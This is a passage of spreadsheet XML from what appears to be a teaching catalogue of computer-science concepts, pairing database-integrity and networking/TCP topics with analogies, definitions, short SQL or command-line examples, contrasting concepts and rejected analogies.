          <t>Application validation — friendlier errors, but only on paths that run it; a constraint binds every writer of the table.</t>
        </is>
      </c>
      <c r="H792" t="inlineStr">
        <is>
          <t>Goalkeeper as last line (sports cliché; says nothing about multiple attack paths).</t>
        </is>
      </c>
      <c r="J792" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K792" t="inlineStr">
        <is>
          <t>Integrity, constraints &amp; migrations</t>
        </is>
      </c>
    </row>
    <row r="793">
      <c r="A793" t="n">
        <v>0</v>
      </c>
      <c r="B793" t="inlineStr">
        <is>
          <t>791</t>
        </is>
      </c>
      <c r="C793" t="inlineStr">
        <is>
          <t>NOT NULL constraint</t>
        </is>
      </c>
      <c r="D793" t="inlineStr">
        <is>
          <t>A paper form with a mousetrap under one box: leave it blank and SNAP — the whole form (row) is rejected at the counter. No half-filled forms ever enter the archive.</t>
        </is>
      </c>
      <c r="E793" t="inlineStr">
        <is>
          <t>Declares that a column can never hold NULL, so every row must supply (or default) a value; the cheapest data-quality win there is.</t>
        </is>
      </c>
      <c r="F793" t="inlineStr">
        <is>
          <t>email TEXT NOT NULL / INSERT INTO users(name) VALUES ('Ada'); / ERROR: null value violates not-null constraint</t>
        </is>
      </c>
      <c r="G793" t="inlineStr">
        <is>
          <t>DEFAULT — a default fills in a missing value at insert; NOT NULL also rejects an explicit NULL.</t>
        </is>
      </c>
      <c r="H793" t="inlineStr">
        <is>
          <t>Seatbelt chime that never stops (chimes nag; constraints refuse).</t>
        </is>
      </c>
      <c r="J793" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K793" t="inlineStr">
        <is>
          <t>Integrity, constraints &amp; migrations</t>
        </is>
      </c>
    </row>
    <row r="794">
      <c r="A794" t="n">
        <v>0</v>
      </c>
      <c r="B794" t="inlineStr">
        <is>
          <t>792</t>
        </is>
      </c>
      <c r="C794" t="inlineStr">
        <is>
          <t>UNIQUE constraint</t>
        </is>
      </c>
      <c r="D794" t="inlineStr">
        <is>
          <t>The marathon official at the start line scans bib numbers against a sorted roster (unique index): a second runner in bib 1042 is yanked off the course before the gun — no two racers ever share a number mid-race.</t>
        </is>
      </c>
      <c r="E794" t="inlineStr">
        <is>
          <t>Guarantees no two rows share the same value(s) in the constrained column(s), enforced by a unique index; NULLs typically don't count as duplicates.</t>
        </is>
      </c>
      <c r="F794" t="inlineStr">
        <is>
          <t>ALTER TABLE users ADD CONSTRAINT uq_email UNIQUE (email); / second signup with the same email: / ERROR: duplicate key value violates uq_email</t>
        </is>
      </c>
      <c r="G794" t="inlineStr">
        <is>
          <t>Primary key — a PK is UNIQUE plus NOT NULL and one per table; UNIQUE constraints can be many and usually admit NULLs.</t>
        </is>
      </c>
      <c r="H794" t="inlineStr">
        <is>
          <t>No two identical snowflakes (snowflake collides with the schema name).</t>
        </is>
      </c>
      <c r="J794" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K794" t="inlineStr">
        <is>
          <t>Integrity, constraints &amp; migrations</t>
        </is>
      </c>
    </row>
    <row r="795">
      <c r="A795" t="n">
        <v>0</v>
      </c>
      <c r="B795" t="inlineStr">
        <is>
          <t>793</t>
        </is>
      </c>
      <c r="C795" t="inlineStr">
        <is>
          <t>CHECK constraint</t>
        </is>
      </c>
      <c r="D795" t="inlineStr">
        <is>
          <t>The amusement-ride height stick bolted at the gate: 'you must be price &gt;= 0 to ride'. The machine measures every row at the turnstile — no operator judgment, no exceptions, not even for staff (admin scripts).</t>
        </is>
      </c>
      <c r="E795" t="inlineStr">
        <is>
          <t>A declarative boolean expression evaluated on every insert or update; rows failing the check are rejected by the engine itself.</t>
        </is>
      </c>
      <c r="F795" t="inlineStr">
        <is>
          <t>ALTER TABLE products / ADD CONSTRAINT positive CHECK (price &gt;= 0); / UPDATE products SET price=-5; -- check violation</t>
        </is>
      </c>
      <c r="G795" t="inlineStr">
        <is>
          <t>Trigger — triggers run arbitrary code and can see other rows; CHECK is a simple per-row predicate the engine fully understands.</t>
        </is>
      </c>
      <c r="H795" t="inlineStr">
        <is>
          <t>Bar bouncer with a rulebook (the bouncer already guards BCNF).</t>
        </is>
      </c>
      <c r="J795" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K795" t="inlineStr">
        <is>
          <t>Integrity, constraints &amp; migrations</t>
        </is>
      </c>
    </row>
    <row r="796">
      <c r="A796" t="n">
        <v>0</v>
      </c>
      <c r="B796" t="inlineStr">
        <is>
          <t>794</t>
        </is>
      </c>
      <c r="C796" t="inlineStr">
        <is>
          <t>Foreign key cascade actions</t>
        </is>
      </c>
      <c r="D796" t="inlineStr">
        <is>
          <t>Demolition day at the parent building: CASCADE flattens every tenant apartment with it; SET NULL leaves tenants standing in the street with no address on file; RESTRICT — the crane refuses to swing while anyone still lives there.</t>
        </is>
      </c>
      <c r="E796" t="inlineStr">
        <is>
          <t>ON DELETE rules decide the children's fate when a parent row dies: CASCADE deletes them too, SET NULL blanks the link, RESTRICT blocks the delete.</t>
        </is>
      </c>
      <c r="F796" t="inlineStr">
        <is>
          <t>user_id BIGINT REFERENCES users(id) / ON DELETE CASCADE / DELETE FROM users WHERE id=7; -- orders go too</t>
        </is>
      </c>
      <c r="G796" t="inlineStr">
        <is>
          <t>Foreign key concept (702) — that is the reference itself; cascade actions are the enforced reaction when the referenced row disappears.</t>
        </is>
      </c>
      <c r="H796" t="inlineStr">
        <is>
          <t>Falling dominoes (dominoes encode only CASCADE, not SET NULL or RESTRICT).</t>
        </is>
      </c>
      <c r="J796" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K796" t="inlineStr">
        <is>
          <t>Integrity, constraints &amp; migrations</t>
        </is>
      </c>
    </row>
    <row r="797">
      <c r="A797" t="n">
        <v>0</v>
      </c>
      <c r="B797" t="inlineStr">
        <is>
          <t>795</t>
        </is>
      </c>
      <c r="C797" t="inlineStr">
        <is>
          <t>Schema migration</t>
        </is>
      </c>
      <c r="D797" t="inlineStr">
        <is>
          <t>The database carries a passport: every schema change is a numbered stamp on the next page. A fresh database replays every stamp in order and arrives at today; a hand-edit without a stamp creates a state no one can reproduce.</t>
        </is>
      </c>
      <c r="E797" t="inlineStr">
        <is>
          <t>Versioned, ordered scripts that change the database schema in lockstep with code; every environment replays the same numbered steps to the same state.</t>
        </is>
      </c>
      <c r="F797" t="inlineStr">
        <is>
          <t>migrations/0042_add_total_to_orders.sql / tools: Flyway, Alembic, Rails, Liquibase / applied once, recorded in a schema_version table</t>
        </is>
      </c>
      <c r="G797" t="inlineStr">
        <is>
          <t>Serialized-format schema evolution (767) — that keeps encoded records readable across versions; migration rewrites live tables with DDL.</t>
        </is>
      </c>
      <c r="H797" t="inlineStr">
        <is>
          <t>Software changelog (changelogs describe; migrations execute).</t>
        </is>
      </c>
      <c r="J797" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K797" t="inlineStr">
        <is>
          <t>Integrity, constraints &amp; migrations</t>
        </is>
      </c>
    </row>
    <row r="798">
      <c r="A798" t="n">
        <v>0</v>
      </c>
      <c r="B798" t="inlineStr">
        <is>
          <t>796</t>
        </is>
      </c>
      <c r="C798" t="inlineStr">
        <is>
          <t>Expand-contract migration</t>
        </is>
      </c>
      <c r="D798" t="inlineStr">
        <is>
          <t>Replacing a bridge without closing the road: build the new span alongside (expand), let traffic use both while repainting the lanes (dual-write, backfill), and demolish the old span only when the last car is off it (contract).</t>
        </is>
      </c>
      <c r="E798" t="inlineStr">
        <is>
          <t>Zero-downtime schema change: add the new shape (expand), dual-write and backfill, switch reads, then drop the old (contract); each step suits both versions.</t>
        </is>
      </c>
      <c r="F798" t="inlineStr">
        <is>
          <t>1) ADD COLUMN full_name / 2) code writes both; backfill old rows / 3) switch reads; 4) DROP first_name, last_name</t>
        </is>
      </c>
      <c r="G798" t="inlineStr">
        <is>
          <t>Blue-green deployment — swaps whole app environments; expand-contract evolves one shared database both versions must use.</t>
        </is>
      </c>
      <c r="H798" t="inlineStr">
        <is>
          <t>Hermit crab changing shells (the crab is briefly homeless — exactly what we avoid).</t>
        </is>
      </c>
      <c r="J798" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K798" t="inlineStr">
        <is>
          <t>Integrity, constraints &amp; migrations</t>
        </is>
      </c>
    </row>
    <row r="799">
      <c r="A799" t="n">
        <v>0</v>
      </c>
      <c r="B799" t="inlineStr">
        <is>
          <t>797</t>
        </is>
      </c>
      <c r="C799" t="inlineStr">
        <is>
          <t>Backups and tested restores</t>
        </is>
      </c>
      <c r="D799" t="inlineStr">
        <is>
          <t>The extinguisher gleaming on the wall is your nightly dump; the fire drill is the restore. GitLab 2017: five backup mechanisms, zero restorable when production vanished. Until you rehearse, the backup is both alive and dead — Schrödinger's backup.</t>
        </is>
      </c>
      <c r="E799" t="inlineStr">
        <is>
          <t>A backup only exists once a restore has been rehearsed: regularly restore to a scratch environment and verify, or you own Schrödinger's backup.</t>
        </is>
      </c>
      <c r="F799" t="inlineStr">
        <is>
          <t>weekly job: restore latest dump to staging / run row counts + app smoke tests / alert if restore time exceeds RTO</t>
        </is>
      </c>
      <c r="G799" t="inlineStr">
        <is>
          <t>Replication — replicas copy your DROP TABLE within milliseconds; only point-in-time backups let you return to before the mistake.</t>
        </is>
      </c>
      <c r="H799" t="inlineStr">
        <is>
          <t>Spare tire never checked (decent, but the drill adds the rehearsal ritual).</t>
        </is>
      </c>
      <c r="J799" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K799" t="inlineStr">
        <is>
          <t>Integrity, constraints &amp; migrations</t>
        </is>
      </c>
    </row>
    <row r="800">
      <c r="A800" t="n">
        <v>0</v>
      </c>
      <c r="B800" t="inlineStr">
        <is>
          <t>798</t>
        </is>
      </c>
      <c r="C800" t="inlineStr">
        <is>
          <t>Soft delete</t>
        </is>
      </c>
      <c r="D800" t="inlineStr">
        <is>
          <t>Instead of ripping the seat out, the theater drapes a 'reserved — do not sell' cloth over it. Auditors may lift the cloth (history intact), but every usher, forever, must remember to skip cloaked seats — one forgetful query sells a ghost a ticket.</t>
        </is>
      </c>
      <c r="E800" t="inlineStr">
        <is>
          <t>Mark rows deleted (a deleted_at flag) instead of removing them, preserving history and undo — at the price of filtering every query forever.</t>
        </is>
      </c>
      <c r="F800" t="inlineStr">
        <is>
          <t>UPDATE users SET deleted_at = now() WHERE id=7; / every query: WHERE deleted_at IS NULL / (or hide behind a view / default scope)</t>
        </is>
      </c>
      <c r="G800" t="inlineStr">
        <is>
          <t>Archiving to a history table — moves rows out, keeping the live table clean; soft delete leaves flagged rows in every query's path.</t>
        </is>
      </c>
      <c r="H800" t="inlineStr">
        <is>
          <t>Zombie rows in a graveyard (fun, but no mechanism forcing the filter).</t>
        </is>
      </c>
      <c r="J800" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K800" t="inlineStr">
        <is>
          <t>Integrity, constraints &amp; migrations</t>
        </is>
      </c>
    </row>
    <row r="801">
      <c r="A801" t="n">
        <v>0</v>
      </c>
      <c r="B801" t="inlineStr">
        <is>
          <t>799</t>
        </is>
      </c>
      <c r="C801" t="inlineStr">
        <is>
          <t>Audit trail</t>
        </is>
      </c>
      <c r="D801" t="inlineStr">
        <is>
          <t>A guestbook chained beside every exhibit: each touch writes a line in ink — who, what, when, old value, new value. The pen has no eraser, the chain has no key, and the curator's own meddling is logged like everyone else's.</t>
        </is>
      </c>
      <c r="E801" t="inlineStr">
        <is>
          <t>An append-only record of who changed what, when, and from/to which values — for compliance, debugging, and trust; nobody edits it, not even admins.</t>
        </is>
      </c>
      <c r="F801" t="inlineStr">
        <is>
          <t>audit_log(id, table_name, row_id, actor, / action, old_val, new_val, at) / INSERT-only; written by trigger or app layer</t>
        </is>
      </c>
      <c r="G801" t="inlineStr">
        <is>
          <t>Write-ahead log — the WAL is physical, recycled after checkpoints, for crash recovery; the audit trail is logical, permanent, for humans.</t>
        </is>
      </c>
      <c r="H801" t="inlineStr">
        <is>
          <t>Security camera footage (footage gets overwritten — audit trails must not).</t>
        </is>
      </c>
      <c r="J801" t="inlineStr">
        <is>
          <t>Data &amp; persistence</t>
        </is>
      </c>
      <c r="K801" t="inlineStr">
        <is>
          <t>Integrity, constraints &amp; migrations</t>
        </is>
      </c>
    </row>
    <row r="802">
      <c r="A802" t="n">
        <v>0</v>
      </c>
      <c r="B802" t="inlineStr">
        <is>
          <t>800</t>
        </is>
      </c>
      <c r="C802" t="inlineStr">
        <is>
          <t>Layered network models</t>
        </is>
      </c>
      <c r="D802" t="inlineStr">
        <is>
          <t>A wedding cake at port 80's party: each tier only touches its neighbors, and the baker swaps the frosting layer without rebuilding the cake.</t>
        </is>
      </c>
      <c r="E802" t="inlineStr">
        <is>
          <t>OSI (7-layer) and TCP/IP (4-layer) models stack protocols so each layer serves the one above and rides the one below.</t>
        </is>
      </c>
      <c r="F802" t="inlineStr">
        <is>
          <t>HTTP rides TCP rides IP rides Ethernet; swap Wi-Fi for Ethernet and HTTP never notices</t>
        </is>
      </c>
      <c r="G802" t="inlineStr">
        <is>
          <t>OOP encapsulation — same word, but here it means each layer wrapping the payload in its own header.</t>
        </is>
      </c>
      <c r="H802" t="inlineStr">
        <is>
          <t>A parfait glass of protocols</t>
        </is>
      </c>
      <c r="J802" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K802" t="inlineStr">
        <is>
          <t>Network fundamentals</t>
        </is>
      </c>
    </row>
    <row r="803">
      <c r="A803" t="n">
        <v>0</v>
      </c>
      <c r="B803" t="inlineStr">
        <is>
          <t>801</t>
        </is>
      </c>
      <c r="C803" t="inlineStr">
        <is>
          <t>IP addresses &amp; CIDR subnets</t>
        </is>
      </c>
      <c r="D803" t="inlineStr">
        <is>
          <t>A street named 192.168.1 with 254 houses; the /24 is a slash of paint marking exactly where the street name ends and house numbers begin.</t>
        </is>
      </c>
      <c r="E803" t="inlineStr">
        <is>
          <t>An IP address identifies a host; CIDR notation (/24) splits it into network prefix and host bits to define subnets.</t>
        </is>
      </c>
      <c r="F803" t="inlineStr">
        <is>
          <t>10.0.0.0/8 = 16M hosts; 192.168.1.0/24 = 254 usable; 10.0.5.7 and 10.9.9.9 share the /8</t>
        </is>
      </c>
      <c r="G803" t="inlineStr">
        <is>
          <t>MAC address — burned-in link-layer hardware ID that never routes beyond the local segment; IP is the routable logical address.</t>
        </is>
      </c>
      <c r="H803" t="inlineStr">
        <is>
          <t>ZIP codes on envelopes</t>
        </is>
      </c>
      <c r="J803" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K803" t="inlineStr">
        <is>
          <t>Network fundamentals</t>
        </is>
      </c>
    </row>
    <row r="804">
      <c r="A804" t="n">
        <v>0</v>
      </c>
      <c r="B804" t="inlineStr">
        <is>
          <t>802</t>
        </is>
      </c>
      <c r="C804" t="inlineStr">
        <is>
          <t>DNS resolution chain</t>
        </is>
      </c>
      <c r="D804" t="inlineStr">
        <is>
          <t>You ask a librarian (resolver) for a book; she phones the root desk, the '.com' floor, then the publisher itself, and pencils the shelf number in her notebook (cache).</t>
        </is>
      </c>
      <c r="E804" t="inlineStr">
        <is>
          <t>Resolving a name walks root, TLD, then authoritative nameservers, with recursive resolvers caching answers by TTL.</t>
        </is>
      </c>
      <c r="F804" t="inlineStr">
        <is>
          <t>dig +trace example.com: . NS, then com. NS, then example.com NS, then A 93.184.216.34</t>
        </is>
      </c>
      <c r="G804" t="inlineStr">
        <is>
          <t>/etc/hosts — a local static override consulted first; the resolution chain only runs on a miss.</t>
        </is>
      </c>
      <c r="H804" t="inlineStr">
        <is>
          <t>Phone-tree bureaucracy</t>
        </is>
      </c>
      <c r="J804" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K804" t="inlineStr">
        <is>
          <t>Network fundamentals</t>
        </is>
      </c>
    </row>
    <row r="805">
      <c r="A805" t="n">
        <v>0</v>
      </c>
      <c r="B805" t="inlineStr">
        <is>
          <t>803</t>
        </is>
      </c>
      <c r="C805" t="inlineStr">
        <is>
          <t>NAT</t>
        </is>
      </c>
      <c r="D805" t="inlineStr">
        <is>
          <t>A hotel receptionist mails all guests' letters under the hotel's single street address, logging room numbers so replies reach the right bed.</t>
        </is>
      </c>
      <c r="E805" t="inlineStr">
        <is>
          <t>NAT rewrites private source IPs/ports to one public address at the router, keeping a translation table to route replies back inside.</t>
        </is>
      </c>
      <c r="F805" t="inlineStr">
        <is>
          <t>laptop 192.168.1.5:51000 mapped by router to 203.0.113.9:62001; reply to :62001 forwarded back</t>
        </is>
      </c>
      <c r="G805" t="inlineStr">
        <is>
          <t>Proxy — an application-level intermediary you configure; NAT rewrites packets transparently at the router.</t>
        </is>
      </c>
      <c r="H805" t="inlineStr">
        <is>
          <t>Masquerade-ball name tags</t>
        </is>
      </c>
      <c r="J805" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K805" t="inlineStr">
        <is>
          <t>Network fundamentals</t>
        </is>
      </c>
    </row>
    <row r="806">
      <c r="A806" t="n">
        <v>0</v>
      </c>
      <c r="B806" t="inlineStr">
        <is>
          <t>804</t>
        </is>
      </c>
      <c r="C806" t="inlineStr">
        <is>
          <t>Latency vs bandwidth</t>
        </is>
      </c>
      <c r="D806" t="inlineStr">
        <is>
          <t>A fire hose that takes ten seconds before water arrives: fat pipe (bandwidth), long wait (latency). Widening the hose never shortens the wait.</t>
        </is>
      </c>
      <c r="E806" t="inlineStr">
        <is>
          <t>Latency is delay per trip (ms); bandwidth is volume per second — a truck of tapes has huge bandwidth but terrible latency.</t>
        </is>
      </c>
      <c r="F806" t="inlineStr">
        <is>
          <t>Same 100ms RTT on 1Gbps and 10Mbps links; a 1-byte ping cares only about RTT, a 4K stream about bandwidth</t>
        </is>
      </c>
      <c r="G806" t="inlineStr">
        <is>
          <t>Throughput — the rate actually achieved; bandwidth is the pipe's capacity ceiling.</t>
        </is>
      </c>
      <c r="H806" t="inlineStr">
        <is>
          <t>Truck full of hard drives crossing the country</t>
        </is>
      </c>
      <c r="J806" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K806" t="inlineStr">
        <is>
          <t>Network fundamentals</t>
        </is>
      </c>
    </row>
    <row r="807">
      <c r="A807" t="n">
        <v>0</v>
      </c>
      <c r="B807" t="inlineStr">
        <is>
          <t>805</t>
        </is>
      </c>
      <c r="C807" t="inlineStr">
        <is>
          <t>Packet switching</t>
        </is>
      </c>
      <c r="D807" t="inlineStr">
        <is>
          <t>A novel mailed page-by-page in numbered envelopes; each page hitchhikes its own route and the reader reassembles the story on arrival.</t>
        </is>
      </c>
      <c r="E807" t="inlineStr">
        <is>
          <t>Data is chopped into independently routed packets that may arrive out of order, sharing links statistically instead of reserving a circuit.</t>
        </is>
      </c>
      <c r="F807" t="inlineStr">
        <is>
          <t>One HTTP response becomes many IP packets; packet 7 may take a different route than packet 6</t>
        </is>
      </c>
      <c r="G807" t="inlineStr">
        <is>
          <t>Circuit switching — reserves a dedicated path for the whole call (old telephony); packets share lines opportunistically.</t>
        </is>
      </c>
      <c r="H807" t="inlineStr">
        <is>
          <t>Confetti with serial numbers</t>
        </is>
      </c>
      <c r="J807" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K807" t="inlineStr">
        <is>
          <t>Network fundamentals</t>
        </is>
      </c>
    </row>
    <row r="808">
      <c r="A808" t="n">
        <v>0</v>
      </c>
      <c r="B808" t="inlineStr">
        <is>
          <t>806</t>
        </is>
      </c>
      <c r="C808" t="inlineStr">
        <is>
          <t>Routing &amp; routing tables</t>
        </is>
      </c>
      <c r="D808" t="inlineStr">
        <is>
          <t>Airport staff at every gate who only point to the next gate; you cross the world via strangers each knowing exactly one arrow.</t>
        </is>
      </c>
      <c r="E808" t="inlineStr">
        <is>
          <t>Each router forwards a packet one hop toward its destination by longest-prefix match in its table; no node knows the full path.</t>
        </is>
      </c>
      <c r="F808" t="inlineStr">
        <is>
          <t>ip route: 10.0.0.0/8 via 10.1.1.1; default via 192.168.1.1; most-specific prefix wins</t>
        </is>
      </c>
      <c r="G808" t="inlineStr">
        <is>
          <t>Switching — forwards frames by MAC within one LAN; routing crosses networks by IP prefix.</t>
        </is>
      </c>
      <c r="H808" t="inlineStr">
        <is>
          <t>Trail of one-armed signposts</t>
        </is>
      </c>
      <c r="J808" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K808" t="inlineStr">
        <is>
          <t>Network fundamentals</t>
        </is>
      </c>
    </row>
    <row r="809">
      <c r="A809" t="n">
        <v>0</v>
      </c>
      <c r="B809" t="inlineStr">
        <is>
          <t>807</t>
        </is>
      </c>
      <c r="C809" t="inlineStr">
        <is>
          <t>MTU &amp; fragmentation</t>
        </is>
      </c>
      <c r="D809" t="inlineStr">
        <is>
          <t>A parade float too tall for the tunnel: saw it into pieces (fragment) or reroute — the tunnel's height sign reads 1500.</t>
        </is>
      </c>
      <c r="E809" t="inlineStr">
        <is>
          <t>The MTU caps packet size per link (Ethernet 1500 bytes); oversized packets fragment or are dropped with 'fragmentation needed'.</t>
        </is>
      </c>
      <c r="F809" t="inlineStr">
        <is>
          <t>ping -M do -s 1472 host succeeds, -s 1473 fails: 1472 + 28 bytes of headers = 1500 MTU</t>
        </is>
      </c>
      <c r="G809" t="inlineStr">
        <is>
          <t>MSS — TCP's payload cap derived from MTU minus IP+TCP headers (typically 1460).</t>
        </is>
      </c>
      <c r="H809" t="inlineStr">
        <is>
          <t>Airline carry-on luggage sizer</t>
        </is>
      </c>
      <c r="J809" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K809" t="inlineStr">
        <is>
          <t>Network fundamentals</t>
        </is>
      </c>
    </row>
    <row r="810">
      <c r="A810" t="n">
        <v>0</v>
      </c>
      <c r="B810" t="inlineStr">
        <is>
          <t>808</t>
        </is>
      </c>
      <c r="C810" t="inlineStr">
        <is>
          <t>Ports</t>
        </is>
      </c>
      <c r="D810" t="inlineStr">
        <is>
          <t>One apartment building (the IP) with 65,535 numbered doors; the web server always answers door 80, SSH lurks behind door 22.</t>
        </is>
      </c>
      <c r="E810" t="inlineStr">
        <is>
          <t>A 16-bit port number multiplexes many services on one IP; well-known ports (80, 443, 22) sit below 1024 and need root to bind.</t>
        </is>
      </c>
      <c r="F810" t="inlineStr">
        <is>
          <t>curl http://example.com:8080; ssh -p 22 host; ephemeral client ports around 49152-65535</t>
        </is>
      </c>
      <c r="G810" t="inlineStr">
        <is>
          <t>IP address — picks the machine; the port picks the process or service on it.</t>
        </is>
      </c>
      <c r="H810" t="inlineStr">
        <is>
          <t>Ship berths at a harbor</t>
        </is>
      </c>
      <c r="J810" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K810" t="inlineStr">
        <is>
          <t>Network fundamentals</t>
        </is>
      </c>
    </row>
    <row r="811">
      <c r="A811" t="n">
        <v>0</v>
      </c>
      <c r="B811" t="inlineStr">
        <is>
          <t>809</t>
        </is>
      </c>
      <c r="C811" t="inlineStr">
        <is>
          <t>TTL &amp; traceroute</t>
        </is>
      </c>
      <c r="D811" t="inlineStr">
        <is>
          <t>A bus ticket with punch holes: every driver punches once, and when it's full you're thrown off — with a postcard mailed home saying exactly where.</t>
        </is>
      </c>
      <c r="E811" t="inlineStr">
        <is>
          <t>Each router decrements a packet's TTL; at zero it is dropped with ICMP 'time exceeded' — traceroute maps paths by sending TTL=1,2,3...</t>
        </is>
      </c>
      <c r="F811" t="inlineStr">
        <is>
          <t>traceroute example.com: hop 1 home router 1ms, hop 2 ISP 8ms, ... hop 12 destination</t>
        </is>
      </c>
      <c r="G811" t="inlineStr">
        <is>
          <t>DNS TTL — cache lifetime in seconds; IP TTL counts router hops, not time.</t>
        </is>
      </c>
      <c r="H811" t="inlineStr">
        <is>
          <t>Countdown wristband at a festival</t>
        </is>
      </c>
      <c r="J811" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K811" t="inlineStr">
        <is>
          <t>Network fundamentals</t>
        </is>
      </c>
    </row>
    <row r="812">
      <c r="A812" t="n">
        <v>0</v>
      </c>
      <c r="B812" t="inlineStr">
        <is>
          <t>810</t>
        </is>
      </c>
      <c r="C812" t="inlineStr">
        <is>
          <t>TCP reliable byte stream</t>
        </is>
      </c>
      <c r="D812" t="inlineStr">
        <is>
          <t>A conveyor belt built over a potholed road: crates below may drop and jumble, but the belt above delivers every byte smoothly in order.</t>
        </is>
      </c>
      <c r="E812" t="inlineStr">
        <is>
          <t>TCP presents an ordered, lossless byte stream over unreliable IP by numbering, acknowledging, and retransmitting segments.</t>
        </is>
      </c>
      <c r="F812" t="inlineStr">
        <is>
          <t>write 'hello' then 'world'; receiver may read 'hel','lowor','ld' — a stream, not messages</t>
        </is>
      </c>
      <c r="G812" t="inlineStr">
        <is>
          <t>UDP — datagrams with boundaries, no ordering or retransmission; TCP is a boundary-less stream.</t>
        </is>
      </c>
      <c r="H812" t="inlineStr">
        <is>
          <t>Zipper joining two jackets</t>
        </is>
      </c>
      <c r="J812" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K812" t="inlineStr">
        <is>
          <t>Transport: TCP &amp; UDP</t>
        </is>
      </c>
    </row>
    <row r="813">
      <c r="A813" t="n">
        <v>0</v>
      </c>
      <c r="B813" t="inlineStr">
        <is>
          <t>811</t>
        </is>
      </c>
      <c r="C813" t="inlineStr">
        <is>
          <t>Three-way handshake</t>
        </is>
      </c>
      <c r="D813" t="inlineStr">
        <is>
          <t>Two fencers salute: 'En garde!' (SYN), 'En garde — ready!' (SYN-ACK), 'Ready!' (ACK) — only then may blades (data) cross.</t>
        </is>
      </c>
      <c r="E813" t="inlineStr">
        <is>
          <t>TCP opens with SYN, SYN-ACK, ACK: both sides exchange initial sequence numbers and confirm before any data flows.</t>
        </is>
      </c>
      <c r="F813" t="inlineStr">
        <is>
          <t>client SYN seq=x; server SYN-ACK seq=y ack=x+1; client ACK ack=y+1; costs one RTT before data</t>
        </is>
      </c>
      <c r="G813" t="inlineStr">
        <is>
          <t>TLS handshake — key exchange that runs after TCP's handshake completes, adding more round trips.</t>
        </is>
      </c>
      <c r="H813" t="inlineStr">
        <is>
          <t>Secret knock pattern on a door</t>
        </is>
      </c>
      <c r="J813" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K813" t="inlineStr">
        <is>
          <t>Transport: TCP &amp; UDP</t>
        </is>
      </c>
    </row>
    <row r="814">
      <c r="A814" t="n">
        <v>0</v>
      </c>
      <c r="B814" t="inlineStr">
        <is>
          <t>812</t>
        </is>
      </c>
      <c r="C814" t="inlineStr">
        <is>
          <t>ACKs &amp; retransmission</t>
        </is>
      </c>
      <c r="D814" t="inlineStr">
        <is>
          <t>Reading a phone number aloud: the listener repeats each chunk back; on silence, you repeat the chunk louder.</t>
        </is>
      </c>
      <c r="E814" t="inlineStr">
        <is>
          <t>The receiver acknowledges bytes received; the sender retransmits anything unacknowledged after a timeout or on duplicate ACKs.</t>
        </is>
      </c>
      <c r="F814" t="inlineStr">
        <is>
          <t>seq 1000 sent, no ACK within RTO leads to resend; 3 duplicate ACKs trigger fast retransmit</t>
        </is>
      </c>
      <c r="G814" t="inlineStr">
        <is>
          <t>NACK-based protocols — the receiver reports gaps; TCP's receiver confirms arrivals and silence signals loss.</t>
        </is>
      </c>
      <c r="H814" t="inlineStr">
        <is>
          <t>Certified-mail return receipts</t>
        </is>
      </c>
      <c r="J814" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K814" t="inlineStr">
        <is>
          <t>Transport: TCP &amp; UDP</t>
        </is>
      </c>
    </row>
    <row r="815">
      <c r="A815" t="n">
        <v>0</v>
      </c>
      <c r="B815" t="inlineStr">
        <is>
          <t>813</t>
        </is>
      </c>
      <c r="C815" t="inlineStr">
        <is>
          <t>Sequence numbers &amp; ordering</t>
        </is>
      </c>
      <c r="D815" t="inlineStr">
        <is>
          <t>Numbered puzzle pieces arriving by pigeon in any order; the receiving desk has numbered slots and only hands over the picture in sequence.</t>
        </is>
      </c>
      <c r="E815" t="inlineStr">
        <is>
          <t>Every TCP byte carries a sequence number so the receiver reorders out-of-order segments and discards duplicates before delivery.</t>
        </is>
      </c>
      <c r="F815" t="inlineStr">
        <is>
          <t>segments arrive 1,3,2: receiver buffers 3, delivers 1,2,3 to the app in order</t>
        </is>
      </c>
      <c r="G815" t="inlineStr">
        <is>
          <t>Queue message ordering — per-partition at best; TCP orders every byte within one connection.</t>
        </is>
      </c>
      <c r="H815" t="inlineStr">
        <is>
          <t>Deck of cards reassembled by index</t>
        </is>
      </c>
      <c r="J815" t="inlineStr">
        <is>
          <t>Networking, web &amp; distributed systems</t>
        </is>
      </c>
      <c r="K815" t="inlineStr">
        <is>
          <t>Transport: TCP &amp; UDP</t>
        </is>
      </c>
    </row>
    <row r="816">
      <c r="A816" t="n">
        <v>0</v>
      </c>
      <c r="B816" t="inlineStr">
        <is>
          <t>814</t>
        </is>
      </c>
      <c r="C816" t="inlineStr">
        <is>
          <t>Flow vs congestion control</t>
        </is>
      </c>
      <c r="D816" t="inlineStr">
